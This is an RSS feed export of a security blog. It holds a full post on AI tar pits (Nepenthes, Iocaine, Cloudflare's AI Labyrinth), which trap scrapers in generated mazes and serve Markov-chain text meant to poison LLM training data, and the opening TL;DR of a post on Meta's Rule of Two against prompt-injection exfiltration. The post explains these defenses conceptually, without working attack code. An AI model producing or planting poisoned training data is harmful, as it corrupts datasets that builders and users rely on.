<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[ToxSec - AI and Cybersecurity ]]></title><description><![CDATA[Security for a world run by machines that lie.]]></description><link>https://www.toxsec.com</link><image><url>https://substackcdn.com/image/fetch/$s_!knHk!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcb28d90f-ea4c-44fc-80b5-d73e8347f8d2_1024x1024.png</url><title>ToxSec - AI and Cybersecurity </title><link>https://www.toxsec.com</link></image><generator>Substack</generator><lastBuildDate>Wed, 24 Jun 2026 14:45:18 GMT</lastBuildDate><atom:link href="https://www.toxsec.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Christopher Ijams]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[toxsec@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[toxsec@substack.com]]></itunes:email><itunes:name><![CDATA[ToxSec]]></itunes:name></itunes:owner><itunes:author><![CDATA[ToxSec]]></itunes:author><googleplay:owner><![CDATA[toxsec@substack.com]]></googleplay:owner><googleplay:email><![CDATA[toxsec@substack.com]]></googleplay:email><googleplay:author><![CDATA[ToxSec]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[AI Tar Pits Are Drowning LLM Scrapers in Infinite Garbage]]></title><description><![CDATA[How tools like Nepenthes, Iocaine, and Cloudflare&#8217;s AI Labyrinth trap unauthorized crawlers in endless mazes of generated nonsense and poison the training set on the way out.]]></description><link>https://www.toxsec.com/p/ai-tar-pits-are-drowning-llm-scrapers</link><guid isPermaLink="false">https://www.toxsec.com/p/ai-tar-pits-are-drowning-llm-scrapers</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 21 Jun 2026 13:31:04 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!yEZG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yEZG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yEZG!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!yEZG!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!yEZG!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!yEZG!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yEZG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7462319,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/201931303?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6b2ed20-98f6-4545-97db-a411b9f0292a_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!yEZG!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!yEZG!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!yEZG!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!yEZG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99d85fe6-5b7e-48ba-8529-b841e7d1a9ea_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> AI tar pits trap LLM scrapers in an infinite loop of machine-generated junk, burning their compute and feeding poison into the training set. Nepenthes started it, Iocaine sharpened it, and Cloudflare shipped AI Labyrinth to 50 billion daily crawler requests. The crawler can&#8217;t tell the maze from the real site, so it walks in and never comes back.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Is an AI Tar Pit?</h2><p>An AI tar pit is a trap that drowns a web crawler in infinite generated garbage instead of blocking it. Block a scraper outright and you tip your hand. The operator sees the 403, shrugs, rotates the IP, switches the user-agent, and comes back through a residential proxy an hour later. So the tar pit does the opposite. It says yes to everything. It serves the bot an endless tree of pages, each one stuffed with links that loop back into the maze, each page slow enough to waste real wall-clock time but cheap enough to not torch your own server.</p><p>The name comes from Nepenthes, a carnivorous pitcher plant. You slip in, you slide down, you don&#8217;t climb back out. Configured as a trap behind a web server, any web crawler that hits it gets an endless stream of randomly generated pages with many URLs to follow. The crawler treats every fake link as a fresh discovery. It chases them. They lead deeper. There&#8217;s no bottom.</p><p>Here&#8217;s the thing that makes it nasty: the bot has no exit condition. A human gets four pages into a maze of word salad and closes the tab. A scraper doesn&#8217;t have taste. It just queues the next URL.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/ai-tar-pits-are-drowning-llm-scrapers/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/ai-tar-pits-are-drowning-llm-scrapers/comments"><span>Leave a comment</span></a></p></blockquote><h2>How the Crawler Falls In</h2><p>The trap works because the scraper can&#8217;t tell a real link from bait. Modern LLM crawlers operate on one dumb assumption: a link is a link, and content is content worth grabbing. They don&#8217;t evaluate whether a page is meaningful before fetching it. They just follow the graph and tokenize whatever comes back.</p><p>Nepenthes weaponizes exactly that. It generates an endless sequence of pages, each with dozens of links that simply go back into the tar pit. Pages are randomly generated, but in a deterministic way, so they appear to be flat static files that never change. Determinism matters here. If the same URL returned different garbage each visit, a smart crawler might flag it as dynamic and bail. Instead the tar pit fakes the one signal scrapers trust most: stability. Same URL, same nonsense, every time. Looks like a real archive.</p><p>And there&#8217;s a deliberate stall baked in. An intentional delay gets added to keep the crawler from bogging down your own server, while still wasting its time. The bot sits there waiting on a slow response that was never going anywhere.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;03c24bcd-9712-4453-8dd3-80955ed76964&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">GET /maze/a8f3/index.html      200   1.4s   38 links
GET /maze/a8f3/c19b.html       200   1.5s   41 links
GET /maze/a8f3/c19b/77de.html  200   1.4s   39 links
GET /maze/a8f3/c19b/77de/...   200   1.6s   40 links
  [depth: 4]  [unique pages so far: 6,212]  [exit: none]
</code></pre></div><p>Six thousand pages deep and the crawler still thinks it&#8217;s making progress. The link count never drops to zero, so the work queue never empties.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4PXs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4PXs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png 424w, https://substackcdn.com/image/fetch/$s_!4PXs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png 848w, https://substackcdn.com/image/fetch/$s_!4PXs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png 1272w, https://substackcdn.com/image/fetch/$s_!4PXs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4PXs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png" width="1185" height="1061" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1061,&quot;width&quot;:1185,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:184783,&quot;alt&quot;:&quot;Falling In: Terminal: AI tar pit terminal showing an LLM crawler trapped in a Nepenthes maze, queue depth climbing past 9,000 pages with zero real data scraped and no exit condition.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/201931303?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Falling In: Terminal: AI tar pit terminal showing an LLM crawler trapped in a Nepenthes maze, queue depth climbing past 9,000 pages with zero real data scraped and no exit condition." title="Falling In: Terminal: AI tar pit terminal showing an LLM crawler trapped in a Nepenthes maze, queue depth climbing past 9,000 pages with zero real data scraped and no exit condition." srcset="https://substackcdn.com/image/fetch/$s_!4PXs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png 424w, https://substackcdn.com/image/fetch/$s_!4PXs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png 848w, https://substackcdn.com/image/fetch/$s_!4PXs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png 1272w, https://substackcdn.com/image/fetch/$s_!4PXs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc7a59ca-4649-4ae0-8c8c-9e713d64096d_1185x1061.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div><hr></div><h2>Poisoning the Model on the Way Out</h2><p>The second payload is the data poison, and it&#8217;s the part the AI companies actually fear. Burning a crawler&#8217;s compute is annoying. Corrupting the training corpus is structural.</p><p>Most tar pits ship an optional Markov-chain text generator. The Markov babble feature gives the crawlers grammatically plausible text to scrape and train on, with the explicit goal of accelerating model collapse. Markov output reads almost right. Real words, real sentence shapes, zero meaning. It&#8217;s the perfect poison because a naive quality filter waves it through. It passes the &#8220;is this English&#8221; check and fails every &#8220;is this true&#8221; check that nobody&#8217;s running at scale.</p><p>Iocaine, the follow-on tool named after the poison from The Princess Bride, leans all the way into this. Gergely Nagy built it after watching crawlers chew through his bandwidth, and his fix was to serve them a heaping plate of garbage designed to slowly corrupt the datasets they feed. Why does this land? Because model collapse is a real, documented failure mode. Train a model on enough of its own slop, or enough synthetic noise dressed up as human text, and the tails of the distribution rot out. We broke down the math on that in <a href="https://www.toxsec.com/p/is-ai-killing-the-internet">AI model collapse makes hallucination inevitable</a>, and the same recursive-degradation problem is what tar pits are trying to force on purpose.</p><p>One catch the operators are honest about. No corpus ships with the tool, on purpose, so every install looks different and harder to fingerprint. You bring your own text. Everybody&#8217;s poison tastes a little different, which is exactly the point.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>Cloudflare Turned It Into a Product</h2><p>Cloudflare took the rebel tooling and shipped it to the whole internet as AI Labyrinth. Same core idea, corporate paint job, opt-in toggle in the dashboard. When it detects improper bot activity, it automatically deploys a network of linked AI-generated pages, no custom rules needed, and it&#8217;s available even on the free plan.</p><p>The scale tells you why they bothered. Cloudflare says AI crawlers generate more than 50 billion requests to its network every single day, and the existing block-and-deny tools tip attackers off so they just shift approach. So instead of slamming the door, they built the maze and made it quiet.</p><p>Then they bolted on a detection layer the indie tools didn&#8217;t have. No real human goes four links deep into a labyrinth of AI nonsense, so anything that does is almost certainly a bot, which hands Cloudflare a brand-new fingerprinting signal. The trap doubles as a sensor. The pages are hidden behind nofollow links a human browser never renders, so the only thing that walks in is something crawling the raw graph. Walk the maze, get tagged, get added to the shared bad-actor list every other Cloudflare customer pulls from.</p><p>This is the same dynamic we keep flagging in <a href="https://www.toxsec.com/p/is-vibe-coding-safe-3-security-checks">the free tooling that catches AI-generated junk</a>: the cheap detection signal is &#8220;did the machine do something no human would bother to do.&#8221;</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;b81a3955-b800-4a1e-9cd9-a362765625e9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># the shape of the trap, not the trap
labyrinth:
  trigger: suspected_ai_crawler
  inject: nofollow_decoy_links     # human browsers never render these
  serve: generated_pages
  on_traversal:
    confidence: high_bot
    action: fingerprint_and_share   # feeds the global block list
</code></pre></div><h2>Where This Goes Next</h2><p>Right now the tar pits win on one assumption: crawlers are greedy and dumb. That edge has a shelf life. The generated mazes still don&#8217;t perfectly match a real site&#8217;s structure or branding, so a crawler trained to spot the seam could learn to route around them. Cloudflare already knows this and has said it wants future labyrinth pages to mirror the host site&#8217;s real layout and content so the seam disappears.</p><p>That&#8217;s the arms race in one sentence. The defender makes the fake indistinguishable from the real. The scraper learns the tell. The defender patches the tell. Round and round, same as every cat-and-mouse game in this space. The tar pit doesn&#8217;t have to win forever. It just has to make scraping expensive enough, today, that somebody else&#8217;s site is the cheaper meal.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops. Upgrade now.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What is an AI tar pit and how does it stop scrapers?</h3><p>An AI tar pit is a defensive trap that catches an unauthorized LLM scraper and feeds it infinite machine-generated garbage instead of blocking it. The crawler follows an endless tree of fake links that loop back on themselves, burning its compute and wall-clock time while it thinks it&#8217;s collecting real data. Tools like Nepenthes and Cloudflare&#8217;s AI Labyrinth pull this off by serving deterministic generated pages that look like stable static files, which is the one signal crawlers trust. The bot has no exit condition, so it keeps queueing URLs that go nowhere.</p><h3>Can a tar pit actually poison an AI model?</h3><p>Yes, that&#8217;s the second payload, and it&#8217;s the part AI companies fear more than the wasted compute. Most tar pits include an optional Markov-chain generator that produces grammatically correct text with no real meaning. That text passes naive quality filters because it reads like English, then corrupts the training corpus that ingests it. Fed at scale, this accelerates model collapse, the documented failure mode where models trained on recursive synthetic slop lose the tails of their data distribution and degrade. Operators supply their own text corpus so each poison is unique and harder to fingerprint.</p><h3>Is deploying an AI tar pit safe for my own site?</h3><p>Not for free. A tar pit makes no distinction between an LLM scraper and a legitimate search engine crawler, so deploying one carelessly can get a site dropped from search results. Because the trap is built to feed crawlers exactly what they hunt for, it also draws constant bot traffic that spikes server CPU. Nepenthes&#8217; own author labels it deliberately malicious software and warns operators not to run it unless they fully understand the fallout. Cloudflare&#8217;s AI Labyrinth is the safer route since it scopes the maze to suspected bots only and keeps it off pages real users see.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[Meta's Rule of Two: The Fix for Agent Prompt Injection]]></title><description><![CDATA[The two-of-three rule that snaps the AI agent prompt injection chain, why it works, and the three seams where it still leaks.]]></description><link>https://www.toxsec.com/p/metas-rule-of-two</link><guid isPermaLink="false">https://www.toxsec.com/p/metas-rule-of-two</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Thu, 18 Jun 2026 13:31:08 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ZXlH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZXlH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZXlH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!ZXlH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!ZXlH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!ZXlH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZXlH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7143232,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/199909100?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c6d931c-9ee5-4267-8d8d-bb4b090801c0_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZXlH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!ZXlH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!ZXlH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!ZXlH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb14c3fbe-8845-4837-8c4d-b200230a4e10_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Meta&#8217;s Rule of Two breaks the prompt injection chain by forbidding any agent from holding all three dangerous capabilities at once: untrusted input, sensitive data, and external communication. Pick two, drop the third, and the exfil path can&#8217;t complete. It&#8217;s the best practical defense shipping today. It also leaks in three places Meta names in its own limitations section, and a 14-author paper just bypassed 12 rival defenses at over 90%.</p><blockquote><p>Recon&#8217;s free. If you want the tradecraft, upgrade.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe 